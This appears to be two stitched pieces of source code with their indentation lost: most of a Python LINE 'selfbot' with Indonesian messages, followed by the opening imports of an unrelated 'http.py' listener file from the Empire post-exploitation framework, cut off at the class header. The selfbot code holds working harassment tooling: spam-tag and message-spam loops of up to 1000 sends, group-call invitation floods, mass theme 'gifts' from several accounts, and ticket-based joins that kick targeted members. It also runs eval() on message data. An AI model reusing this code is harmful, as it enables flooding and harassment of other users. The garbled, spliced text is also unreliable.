r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
ret_ = "╔══[ Music ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Waiting Audio ]"
cl.sendText(msg.to, str(ret_))
cl.sendText(msg.to, "Mohon bersabar musicnya lagi di upload")
cl.sendAudioWithURL(msg.to, song[3])
except:
cl.sendText(to, "Musik tidak ditemukan")
elif cmd.startswith("gimage: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "https://api.xeonwz.ga/api/image/google?q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["data"] != []:
start = timeit.timeit()
items = data["data"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"「Google Image」\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n™↔ Author : ' + str(vid.author)
durasi = '\n™↔ Duration : ' + str(vid.duration)
suka = '\n™↔ Likes : ' + str(vid.likes)
rating = '\n™↔ Rating : ' + str(vid.rating)
deskripsi = '\n™↔ Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n™↔ Author : ' + str(vid.author)
durasi = '\n™↔ Duration : ' + str(vid.duration)
suka = '\n™↔ Likes : ' + str(vid.likes)
rating = '\n™↔ Rating : ' + str(vid.rating)
deskripsi = '\n™↔ Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "™↔ Link : " + "https://www.instagram.com/" + instagram
text = "™↔ Name : "+namaIG+"\n™↔ Username : "+usernameIG+"\n™↔ Biography : "+bioIG+"\n™↔ Follower : "+followerIG+"\n™↔ Following : "+followIG+"\n™↔ Post : "+mediaIG+"\n™↔ Verified : "+verifIG+"\n™↔ Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"™↔ Informasi™\n\n"+"™↔ Date Of Birth : "+lahir+"\n™↔ Age : "+usia+"\n™↔ Ultah : "+ultah+"\n™↔ Zodiak : "+zodiak)
elif cmd.startswith("jumlah: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["RAlimit"] = num
cl.sendText(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["RAlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
jmlh = int(wait["limit"])
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
if jmlh <= 1000:
for x in range(jmlh):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi batas")
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["RAmessage1"]))
ki.sendMessage(midd, str(Setmain["RAmessage1"]))
kk.sendMessage(midd, str(Setmain["RAmessage1"]))
kc.sendMessage(midd, str(Setmain["RAmessage1"]))
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
if True:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
#===========Protection============#
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Semua pro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Semua pro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectjoin:
msgs = ""
else:
protectjoin.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectjoin:
protectjoin.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "admin:repeat" or text.lower() == 'admin:repeat':
if msg._from in admin:
wait["delladmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:repeat" or text.lower() == 'staff:repeat':
if msg._from in admin:
wait["dellstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:repeat" or text.lower() == 'bot:repeat':
if msg._from in admin:
wait["dellbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
cl.sendText(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
cl.sendText(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["MentionKick"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
cl.sendText(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
cl.sendText(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
cl.sendText(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
cl.sendText(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB Blacklist User\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = cl.getContacts(wait["blacklist"])
mc = "「%i」User Blacklist" % len(ragets)
cl.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========COMMAND SET============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["RAmessage1"] = spl
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg mu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg mu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg mu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg mu :\n\n「 " + str(Setmain["RAmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg mu :\n\n「 " + str(wait["mention"]) + " 」")
#===========JOIN TICKET============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if msg._from in admin:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
# bot(op)
# Don't remove this line, if you wan't get error soon!
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
#thread1.daemon = True
thread1.start()
thread1.join()
except Exception as e:
pass
|
http.py | from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
